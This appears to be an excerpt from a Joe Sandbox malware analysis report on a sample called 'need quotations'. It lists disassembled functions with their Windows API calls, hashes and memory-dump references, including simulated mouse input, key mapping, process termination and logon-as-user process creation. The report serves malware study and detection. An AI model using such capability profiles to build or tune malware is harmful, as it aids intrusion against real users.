Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: bba2263baa675a9459b92cdcf35609275d19d2448d00ac08adbffc0f3075c34f
Instruction ID: e72416a71f398970d4e67b2a83f5cc45b4cfea2c0e1b9e2ce39b41a5cf56cccf
Opcode Fuzzy Hash: bba2263baa675a9459b92cdcf35609275d19d2448d00ac08adbffc0f3075c34f
Instruction Fuzzy Hash: 84513831228300AFC704EF68C885E6ABBE9FF89304F14492DF555972A1DB71EA25CF52

Function 002A84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 002A8540
GetMenuItemCount.USER32(00000000), ref: 002A8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002A859F
GetMenuItemID.USER32(?,?), ref: 002A860E
GetSubMenu.USER32(?,?), ref: 002A861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 002A866D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 88b58e5a7b5aaad3ae698a60e7275da9d08e6aa204bd11457aeddeb5e87a76fe
Instruction ID: d31272d22928355b96d9fcb2cc0f6de7e06f5e68c414f08492f423643aa4aba3
Opcode Fuzzy Hash: 88b58e5a7b5aaad3ae698a60e7275da9d08e6aa204bd11457aeddeb5e87a76fe
Instruction Fuzzy Hash: AD51CB31E10225AFDB15EFA4C845AAEB7F8EF09710F1140A9E901BB381CF70AE508F90

Function 00284AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00284B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00284B5B
IsMenu.USER32(00000000), ref: 00284B7B
CreatePopupMenu.USER32 ref: 00284BAF
GetMenuItemCount.USER32(000000FF), ref: 00284C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00284C3E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3233d8dbad0bfb7178973738789270382765706aa1df0940aaa1528b89db0684
Instruction ID: 8934a54e9e8e123bbab8b378c8f61b26f1036d6038daac376ec393296da5e0aa
Opcode Fuzzy Hash: 3233d8dbad0bfb7178973738789270382765706aa1df0940aaa1528b89db0684
Instruction Fuzzy Hash: 8B51C378A1220BDBDF20FF64D888BADBBF8BF44318F14415AE4159B2D1D3B09964CB51

Function 00298DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,002DDC00), ref: 00298E7C
WSAGetLastError.WSOCK32(00000000), ref: 00298E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00298EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00298EC5
_strlen.LIBCMT ref: 00298EF7
WSAGetLastError.WSOCK32(00000000), ref: 00298F6A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 9eb482f39f52befde89a07e60f885b7cf2814be587ea797bd2764c03cff9b595
Instruction ID: 1ebd9ccf52574352cf62a8e26d1b97a684ccf8e4ec679b2e363917104bda3c5c
Opcode Fuzzy Hash: 9eb482f39f52befde89a07e60f885b7cf2814be587ea797bd2764c03cff9b595
Instruction Fuzzy Hash: 6241E371520104AFCB18EF64CD89EAEB7B9EF09314F244669F51A972D1DF70AE24CB20

Function 0025ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

BeginPaint.USER32(?,?,?), ref: 0025AC2A
GetWindowRect.USER32(?,?), ref: 0025AC8E
ScreenToClient.USER32(?,?), ref: 0025ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0025ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0025AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002BE673

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: b67a03db46d20fa5df3a3c81b3ee588214b5a6b3123049623d502f60aaede002
Instruction ID: d8b15bb0e310438e9f05c21d1fcb0de6ef43fbafb7d71ec25f9f4228a6c5db3b
Opcode Fuzzy Hash: b67a03db46d20fa5df3a3c81b3ee588214b5a6b3123049623d502f60aaede002
Instruction Fuzzy Hash: AE41DE70111201AFC711DF24DC89FA67BFCAB59362F18036AFDA4872A1C771A858DB62

Function 002AE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00301628,00000000,00301628,00000000,00000000,00301628,?,002BDC5D,00000000,?,00000000,00000000,00000000,?,002BDAD1,00000004), ref: 002AE40B
EnableWindow.USER32(00000000,00000000), ref: 002AE42F
ShowWindow.USER32(00301628,00000000), ref: 002AE48F
ShowWindow.USER32(00000000,00000004), ref: 002AE4A1
EnableWindow.USER32(00000000,00000001), ref: 002AE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002AE4E8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 2f13c94cc4935fc2b2b6b0da366e0951467ce80259eb7e99a55dfc6b15638c55
Instruction ID: 1060e65dc6d9b53cd54a75bf85a2d6102c1bc7180a701701e737b71cbf935ad3
Opcode Fuzzy Hash: 2f13c94cc4935fc2b2b6b0da366e0951467ce80259eb7e99a55dfc6b15638c55
Instruction Fuzzy Hash: 7F418334601142EFDF21CF24D499F947BE5BF0A304F5941B9EA588F1A2CB31E856CB61

Function 002898BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 002898D1

Part of subcall function 0025F4EA: std::exception::exception.LIBCMT ref: 0025F51E
Part of subcall function 0025F4EA: __CxxThrowException@8.LIBCMT ref: 0025F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00289908
EnterCriticalSection.KERNEL32(?), ref: 00289924
LeaveCriticalSection.KERNEL32(?), ref: 0028999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002899B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 002899D2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 57e9f1f0656eefc6087f845cba3baab0942e964484d4ca34610f090a61ac8012
Instruction ID: b5928ee406ac8d44f1d75a74af41fe6bdbf285de4c08800d01fa1fa7cc8e8f45
Opcode Fuzzy Hash: 57e9f1f0656eefc6087f845cba3baab0942e964484d4ca34610f090a61ac8012
Instruction Fuzzy Hash: 68317031900105EBDB10AF94DD89EABB778FF45310B1480B9F904AB286E770DE24DBA5

Function 00299B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,002977F4,?,?,00000000,00000001), ref: 00299B53

Part of subcall function 00296544: GetWindowRect.USER32(?,?), ref: 00296557

GetDesktopWindow.USER32 ref: 00299B7D
GetWindowRect.USER32(00000000), ref: 00299B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00299BB6

Part of subcall function 00287A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

GetCursorPos.USER32(?), ref: 00299BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00299C44

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: dee5a39795835b52e8de54b759ae17de3d167385c9f968f40748ef53e385d619
Instruction ID: 0dd94019712860e3f0a5506875793366cc3c384a9cfcccc5cd6289dc509da32d
Opcode Fuzzy Hash: dee5a39795835b52e8de54b759ae17de3d167385c9f968f40748ef53e385d619
Instruction Fuzzy Hash: E931C172104306ABCB10DF58EC49F9AB7EDFF88314F00092AF599E7181D671E958CB91

Function 0027AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0027AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0027AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0027AFC4
CloseHandle.KERNEL32(00000004), ref: 0027AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0027AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0027B012

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: c372239d06dc851d3093c3e8f2722e10d54443cbf54e0da390c53efeef758ee3
Instruction ID: a6cc433afce00822f28cfcfb10b1d40aa5f315a45b521eca733e7a58f95f223a
Opcode Fuzzy Hash: c372239d06dc851d3093c3e8f2722e10d54443cbf54e0da390c53efeef758ee3
Instruction Fuzzy Hash: EB21807211520EAFCF028F94ED09FAE7BA9EF84314F048025FA05A2161C3769D20DB62

Function 002AEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0025AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0025AFE3
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025AFF2
Part of subcall function 0025AF83: BeginPath.GDI32(?), ref: 0025B009
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002AEC20
LineTo.GDI32(00000000,00000003,?), ref: 002AEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002AEC42
LineTo.GDI32(00000000,00000000,?), ref: 002AEC52
EndPath.GDI32(00000000), ref: 002AEC62
StrokePath.GDI32(00000000), ref: 002AEC72

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d920991315e0a23cc223703b26f1748f6724b77495e40c10ad40f69721108d4f
Instruction ID: a8b07c66af6248382c7618c97b181b0f209a8fe1eeca79906530ff08c40cb546
Opcode Fuzzy Hash: d920991315e0a23cc223703b26f1748f6724b77495e40c10ad40f69721108d4f
Instruction Fuzzy Hash: B711DB7200014DBFEF129F94ED88FEA7F6DEB08364F048126BE1999160D7729D55DBA0

Function 0027E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0027E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0027E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0027E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0027E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0027E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0027E209

Part of subcall function 00279AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00279A05,00000000,00000000,?,00279DDB), ref: 0027A53A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: c6936df7dae71bbc4e47900a7cdd22369ac158a88723bf226f54c2835d75d7f0
Instruction ID: 4c0be7be5fdeb18e39f92a9135992aec85cfc095d59055bb42f63090cfe76165
Opcode Fuzzy Hash: c6936df7dae71bbc4e47900a7cdd22369ac158a88723bf226f54c2835d75d7f0
Instruction Fuzzy Hash: 890184B5E00315BFEF109FA59C49F5EBFB8EB48351F018066EA08A7290D6719C00CFA0

Function 00267B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00267B47

Part of subcall function 0026123A: __initp_misc_winsig.LIBCMT ref: 0026125E
Part of subcall function 0026123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00267F51
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00267F65
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00267F78
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00267F8B
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00267F9E
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00267FB1
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00267FC4
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00267FD7
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00267FEA
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00267FFD
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00268010
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00268023
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00268036
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00268049
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0026805C
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0026806F

__mtinitlocks.LIBCMT ref: 00267B4C

Part of subcall function 00267E23: InitializeCriticalSectionAndSpinCount.KERNEL32(002FAC68,00000FA0,?,?,00267B51,00265E77,002F6C70,00000014), ref: 00267E41

__mtterm.LIBCMT ref: 00267B55

Part of subcall function 00267BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00267B5A,00265E77,002F6C70,00000014), ref: 00267D3F
Part of subcall function 00267BBD: _free.LIBCMT ref: 00267D46
Part of subcall function 00267BBD: DeleteCriticalSection.KERNEL32(002FAC68,?,?,00267B5A,00265E77,002F6C70,00000014), ref: 00267D68

__calloc_crt.LIBCMT ref: 00267B7A
GetCurrentThreadId.KERNEL32 ref: 00267BA3

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: a0f63b371f2118dc3ef930147e84693b7fbcce721924d5f83431e781f2a3420f
Instruction ID: cc33cb3aa76f4b991e3f16d4f0dcb1cb90a557329f9992a4f6d60198fbf78703
Opcode Fuzzy Hash: a0f63b371f2118dc3ef930147e84693b7fbcce721924d5f83431e781f2a3420f
Instruction Fuzzy Hash: DDF0903213D71219EA257B747C0AA5A26849F02B7CF3406A9F864C50E2FF6188F18960

Function 002427EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0024281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00242825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00242830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0024283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00242843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0024284B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6e09d3fd72ed2d157b860db7e1782af35298b6a8398c0d2d5a97317246725471
Instruction ID: e49c02ce5ececa3d635442efc7f70de4f7559ec15cecb38ffa9a8955a933df81
Opcode Fuzzy Hash: 6e09d3fd72ed2d157b860db7e1782af35298b6a8398c0d2d5a97317246725471
Instruction Fuzzy Hash: 2A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 00289AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 3e78e504f85751d14edd13893fbc96d17e41b03cfb7b04e61aecc938210ca851
Instruction ID: f58be565e7527b1fea8dae49a13de211238b939bc8be84124fbff686d06d7790
Opcode Fuzzy Hash: 3e78e504f85751d14edd13893fbc96d17e41b03cfb7b04e61aecc938210ca851
Instruction Fuzzy Hash: A501813A212212ABD7192F98FC9CDFB7769FF88701B18043AF903920E1DB65A851DB51

Function 00287BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00287C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00287C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00287C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00287C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00287C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00287C4C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 87bfcb527ff554bb57cc0a9761dd2316a3b3b9f574fffaf133f985af0d909c6b
Instruction ID: ce6696f5e7e73d3a4625fab4d7b1026a050af1f36d1a1973ce48a66c7c7cf80c
Opcode Fuzzy Hash: 87bfcb527ff554bb57cc0a9761dd2316a3b3b9f574fffaf133f985af0d909c6b
Instruction Fuzzy Hash: 41F03A76242158BBE7215B52BC0EEEFBB7CEFC6B11F000069FA0591191E7A06A41C6B5

Function 00289A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00289A33
EnterCriticalSection.KERNEL32(?,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A5E

Part of subcall function 002893D1: CloseHandle.KERNEL32(?,?,00289A6B,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 002893DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00289A71
LeaveCriticalSection.KERNEL32(?,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A78

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
